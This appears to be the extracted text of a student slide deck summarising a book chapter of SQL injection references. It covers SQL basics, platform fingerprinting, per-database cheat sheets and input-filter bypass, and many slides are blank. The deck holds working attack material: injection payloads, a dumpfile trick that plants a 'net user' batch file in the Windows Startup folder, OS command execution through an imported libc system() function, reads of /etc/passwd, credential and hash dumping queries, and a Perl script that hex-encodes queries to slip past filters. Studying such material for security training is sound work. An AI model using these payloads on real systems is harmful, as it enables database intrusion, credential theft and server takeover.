This document provides an extensive overview of Structured Query Language (SQL), focusing on SQL injection techniques, common queries, and methods to exploit vulnerabilities. It discusses the historical development of SQL, various types of SQL statements, and detailed strategies for identifying and attacking different database platforms. The document also includes cheat sheets for SQL injections and references to various tools and resources related to SQL security and exploitation.

1. CHAPTER 10ReferencesPrepared by :-Mohammed Zeinelabdeen.Mohammed Siddig Ahmed .Omer Salih Dawood.

2. OVER VIEWStructured Query Language (SQL) .SQL Injection Quick Reference.Bypassing Input Validation Filters.Troubleshooting SQL Injection Attacks.SQL Injection on Other Platforms.2/04/2011CHAPTER 102

3. Structured Query Language (SQL)2/04/20113CHAPTER 10

4. Structured Query Language (SQL)SQL was originally developed at IBM in early 1970. Formalized until 1986 by American National Standards Institute (ANSI).We using the SQL standard defined by the International Organization for Standardization (ISO).2/04/2011CHAPTER 104

5. SQL QueriesSQL queries are made up of one or more SQL statements that are effectively instructions for the database server to carry out. it may include a conditional clause to target specific rows in a table(WHERE). The OR and AND operators are used when multiple conditions are to be evaluated.SELECT StatementSELECT * FROM tblUsers ;SELECT * INTO hackerTable FROM tblusersUNION OperatorSELECT username, password FROM tblUsers UNION SELECT username, password FROM tblAdmins;SELECT username, password FROM tblUsers UNION ALL SELECT username, password FROM tblAdmins2/04/2011CHAPTER 105

6. SQL Queries (CON..)INSERT StatementINSERT IN TO tblUsers VALUES (5,'john','smith',0);INSERT INTO tblUsers(id, username, password, priv) VALUES (5, 'john','smith',0);UPDATE StatementUPDATE tblUsers SET priv=0 WHERE username = 'sarah‘;DELETE StatementDELETE FROM tblUsers WHERE username = 'admin‘;2/04/2011CHAPTER 106

7. SQL Queries (CON..)Notes from the Underground…SELECT story FROM news WHERE id=19;SELECT story FROM news WHERE id=19 OR 1=1 ;SELECT story FROM news WHERE id=19 OR 1=2 ;UPDATE tblUsers SET password='letmein' WHEREemailaddress='someuser@victim.com‘;UPDATE tblUsers SET password='letmein' WHERE emailaddress=‘ ’ or 1=1’ ;2/04/2011CHAPTER 107

8. SQL Queries (CON..)DROP StatementDROP TABLE tblusers;CREATE TABLE StatementCREATE TABLE shoppinglist(item int, name varchar(100));CREATE TABLE shoppinglist as select * from dba_users;ORDER BY ClauseSELECT cost, product FROM orders ORDER BY cost DESC;2/04/2011CHAPTER 108

9. SQL Queries (CON..)ALTER TABLE StatementALTER TABLE tblUsers ADD comments varchar(100);ALTER TABLE tblUsers DROP COLUMN comments;ALTER TABLE tblUsers ALTER COLUMN comments varchar(500);GROUP BY StatementSELECT customer,SUM(cost) FROM orders WHERE customer = 'Anthony Anteater‘ GROUP BY customer;2/04/2011CHAPTER 109

10. SQL Queries (CON..)Limiting the Result Set2/04/201110CHAPTER 10

11. SQL Injection Quick Reference2/04/201111CHAPTER 10

12. SQL Injection Quick Referencemost common SQL queries and techniques we will need when exploiting an SQL injection vulnerabilityidentify the database platform.SQL injection cheat sheet2/04/201112CHAPTER 10

13. Identifying the Database PlatformWeb server platform and scripting language.IIS + ASP.NET => SQLServer .APACHE + PHP => MySQL . …. Etc.But we need more scientific approach ……2/04/201113CHAPTER 10

14. Identifying the Database PlatformTime Delay Inferenceis a long-standing method of identifying the database platform.OR .. submitting “heavy queries” designed to consume the processor for a measureable length of time.2/04/201114CHAPTER 10

15. identify the database SQL Dialect Inference2/04/201115CHAPTER 10

16. identify the databaseFor example …if we suspect that the database platform is either Microsoft SQL Server or Oracle‘ AND ‘ ahmed’ || ‘ali’ = ‘ahmedali’--‘ AND ‘ahmed’ + ‘ali’ = ‘ahmedali’--2/04/201116CHAPTER 10

17. Combining Multiple Rowsonly one column and one row can be returned at a time.To bypass this restriction it is possible to concatenate all rows and columns into a single string.2/04/201117CHAPTER 10

18. Combining Multiple RowsExamples …SELECT GROUP_CONCAT(user) FROM mysql.user; -- returns a comma separated list of users.2/04/201118CHAPTER 10

19. Combining Multiple RowsSELECT sys.stragg (distinct username||';') FROM all_users; -- Returns all usernames on a single line2/04/201119CHAPTER 10

20. Cheat sheetsa quick reference of common SQL statements used in SQL injection attacks against ORACLE and MySQL.2/04/201120CHAPTER 10

21. Cheat SheetPHP and Ruby on Rails applications.Configuration Information and Schema2/04/201121CHAPTER 10

22. Cheat Sheet2/04/201122CHAPTER 10

23. Attacking the Database ServerSystem Command ExecutionIt is possible to execute operating system commands by creating a malicious script file on the target serverSELECT 'system_commands' INTO dumpfiletrojanpathSELECT 'net user x x ' into dumpfile 'c:\\Documents and Settings\\All Users\\Start Menu\\Programs \\Startup\\attack.bat'2/04/201123CHAPTER 10

24. Cracking Database Passwordsextract user password hashes from the mysql.user table.SELECT concat(user,":",password) FROM mysql.userPassword hashes can then be cracked using http://hashcrack.com/www.openwall.com/john/ Attacking the Database Server2/04/201124CHAPTER 10

25. Attacking the Database Directlyexecute code by directly connecting to the MySQL server and creating a user-defined function.we can download a tool to perform this attackWindows: ww.scoobygang.org/HiDDenWarez/mexec.plWindows:www.0xdeadbeef.info/exploits/raptor_winudf.tgz Attacking the Database Server2/04/201125CHAPTER 10

26. File Read/WriteThe MySQL LOAD_FILE function returns a string containing the contents of a specified file.The database user requires the file_priv privilege to invoke this function.SELECT LOAD_FILE('/etc/passwd');- we can use a tool called SqlDumper to read file contents via blind SQL injection. Attacking the Database Server2/04/201126CHAPTER 10

27. Cheat Sheet2/04/201127CHAPTER 10

28. Cheat Sheet2/04/201128CHAPTER 10

29. Cheat Sheet2/04/201129CHAPTER 10

30. Attacking the Database Serverthere are two different types of injection in ORACLE traditional SQL injectiononly a single SQL statement.PL/SQL injectionexecute entire PL/SQL blocks.2/04/201130CHAPTER 10

31. More than 100 Oracle tables contain password information.Sometimes the passwords are available as clear text. Cracking Database Passwords2/04/201131CHAPTER 10

32. select view_username, sysman.decrypt(view_password) from sysman.mgmt_view_user_credentials; Cracking Database Passwords2/04/201132CHAPTER 10

33. select credential_set_column, sysman.decrypt (credential_value) from sysman.mgmt_credentials2;2/04/2011CHAPTER 1033 Cracking Database Passwords

34. Oracle password hashes can then be cracked using a variety of freely available tools, such asWoraauthbf.John the Ripper.Gsauditor.Checkpwd. Cain & Abel.2/04/2011CHAPTER 1034 Cracking Database Passwords

35. Bypassing Input Validation Filters2/04/201135CHAPTER 10

36. Bypassing Input Validation FiltersYou can bypass input validation filters that rely on rejecting known bad characters and string literals by encoding your input. Quote FiltersThe single-quote character (‘) is synonymous with SQL injection attacks. The idea behind this approach is to prevent the attacker from breaking out of quote-delimited data. 2/04/2011CHAPTER 1036

37. Quote Filters (con…)SELECT ‘ABC’2/04/2011CHAPTER 1037

38. Quote Filters (con…)Microsoft SQL Server also allows you to build your query within a variable and then call EXEC to execute it.SELECT ‘ABC’ into it via a HEX-encoded string: DECLARE @q varchar(8000) SELECT @q=0x53454c454354202741424327 EXEC(@q)You can use the following Perl script to automatically encode SQL statements using this technique:2/04/2011CHAPTER 1038

39. Quote Filters (con…)#!/usr/bin/perlprint "Enter SQL query to encode:";$teststr=<STDIN>;chomp $teststr;$hardcoded_sql ='declare @q varchar(8000) '.'select @q=0x*** '.'exec(@q)';$prepared = encode_sql($teststr);$hardcoded_sql =∼s/\*\*\*/$prepared/g;print "\n[*]-Encoded SQL:\n\n";print $hardcoded_sql ."\n";sub encode_sql{@subvar=@_;my $sqlstr =$subvar[0];@ASCII = unpack("C*", $sqlstr);foreach $line (@ASCII) {$encoded = sprintf('%lx',$line);$encoded_command .= $encoded;}return $encoded_command;}CHAPTER 10392/04/2011

40. HTTP EncodingYou can sometimes bypass input validation filters that reject known bad characters (often referred to as blacklisting).2/04/2011CHAPTER 1040

41. HTTP Encoding (con…)412/04/2011CHAPTER 10

42. HTTP Encoding (con…)422/04/2011CHAPTER 10

43. Troubleshooting SQL Injection Attacks

44. Troubleshooting SQL Injection Attacks:Table lists some of the common challenges and errors that are frequently encountered when attempting to exploit an SQL injection flaw across various platforms.2/04/2011CHAPTER 1044

45. 2/04/201145CHAPTER 10

46. 2/04/201146CHAPTER 10

47. 472/04/2011CHAPTER 10

48. 2/04/2011CHAPTER 1048

49. 2/04/2011CHAPTER 1049

50. SQL Injectionon Other Platforms2/04/201150CHAPTER 10

51. SQL Injection on Other Platforms.This section is intended to provide a quick reference for other, less commonplatforms, such as PostgreSQL, DB2, Informix, and Ingres.PostgreSQL :Extracting the PostgreSQL Database Configuration Information:512/04/2011CHAPTER 10

52. Extracting the PostgreSQL Database Schema :2/04/2011CHAPTER 1052

53. Blind Sql injection Function :Attacking the Database Server: PostgreSQLPostgreSQL does not offer a built-in procedure for executing operating system commands it is possible to import functions such as system() from an external .dll or Shared Object (.so) file.System Command Execution:import the system function from the standard UNIX libc library:CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6‘,'system' LANGUAGE 'C' STRICT;The system function can then be called by executing the following SQL query: SELECT system('command');532/04/2011CHAPTER 10

54. Local File Access:Local files can be read by the superuser account using the following SQL:CREATE TABLE filedata(t text);COPY filedata FROM '/etc/passwd'; --It is also possible to write local files using the following SQL:CREATE TABLE thefile(evildata text);INSERT INTO thefile(evildata) VALUES ('some evil data');COPY thefile (evildata) TO '/tmp/evilscript.sh';Cracking Database Passwords :PostgreSQL passwords are hashed using the MD5 algorithm:select usename||':'||passwd from pg_shadow;2/04/2011CHAPTER 1054

55. DB2 Cheat Sheet :The DB2 database server from IBM is perhaps one of the least popular database platforms to find integrated with a Web application.Extracting the PostgreSQL Database Configuration Information:552/04/2011CHAPTER 10

56. Extracting DB2 Database Schema :Blind Sql injection Function :2/04/2011CHAPTER 1056

57. Informix Cheat Sheet :The Informix database server is distributed by IBM and is not commonly encountered when compared to other database platforms.Extracting the Informix Database Configuration Information:2/04/2011CHAPTER 1057

58. Extracting Informix Database Schema :Blind Sql injection Function :582/04/2011CHAPTER 10

59. Ingres Cheat Sheet :The Ingres database is an open source database available for all major operating systems.Ingres is one of the least popular databases to find integrated with a Web application.Extracting the Ingres Database Configuration Information:592/04/2011CHAPTER 10

60. Extracting Ingres Database Schema :Blind Sql injection Function :2/04/2011CHAPTER 1060

61. Microsoft Access :Microsoft Access databases do not scale well with enterprise applications, and thereforeare usually encountered only when the application has minimal database requirements.Brett Moore of insomniasec.com has published an excellent paper on SQL injection with Microsoft Access which you can find here: www.insomniasec.com/publications/Access-Through- Access.pdf2/04/2011CHAPTER 1061

62. Resources :SQL Injection White Papers■ “Advanced SQL Injection” by Victor Chapela:www.owasp.org/index.php/Image:Advanced_SQL_Injection.ppt“Advanced SQL Injection in SQL Server Applications” by Chris Anley:www.ngssoftware.com/papers/advanced_sql_injection.pdf■ “Buffer Truncation Abuse in .NET and Microsoft SQL Server” by GaryO’Leary-Steele:http://scanner.sec-1.com/resources/bta.pdf■ “Access through Access” by Brett Moore:www.insomniasec.com/publications/Access-Through-Access.pdf■ “Time-Based Blind SQL Injection with Heavy Queries” by Chema Alonso:http://technet.microsoft.com/en-us/library/cc512676.aspxSQL Injection Cheat Sheets■ PentestMonkey.com SQL injection cheat sheets for Oracle, Microsoft SQL Server,MySQL, PostgreSQL, Ingres, DB2, and Informix:http://pentestmonkey.net/cheat-sheets/■ Michaeldaw.org SQL injection cheat sheets for Sybase, MySQL, Oracle, PostgreSQL, DB2, and Ingres:http://michaeldaw.org/sql-injection-cheat-sheet/■ FerruhMavituna cheat sheets for MySQL, SQL Server, PostgreSQL, and Oracle:http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/■ FerruhMavituna cheat sheets for Oracle:http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/622/04/2011CHAPTER 10

63. SQL Injection Exploit Tools :BSQL Hacker is a relatively new player in the SQL injection exploit world.The tool is a Windows-based GUI application that supports Microsoft SQL Server,Oracle, and MySQL. BSQL Hacker supports blind and error-based SQL injectiontechniques:http://labs.portcullis.co.uk/application/bsql-hacker/The Sec-1 Automagic SQL injection (SASI) tool is a Microsoft SQL Server exploittool written in Perl:http://scanner.sec-1.com/resources/sasi.zip

64. Password Cracking Tools :Cain & Abel:www.oxid.itWoraauthbf:www.soonerorlater.hu/index.khtml?article_id=513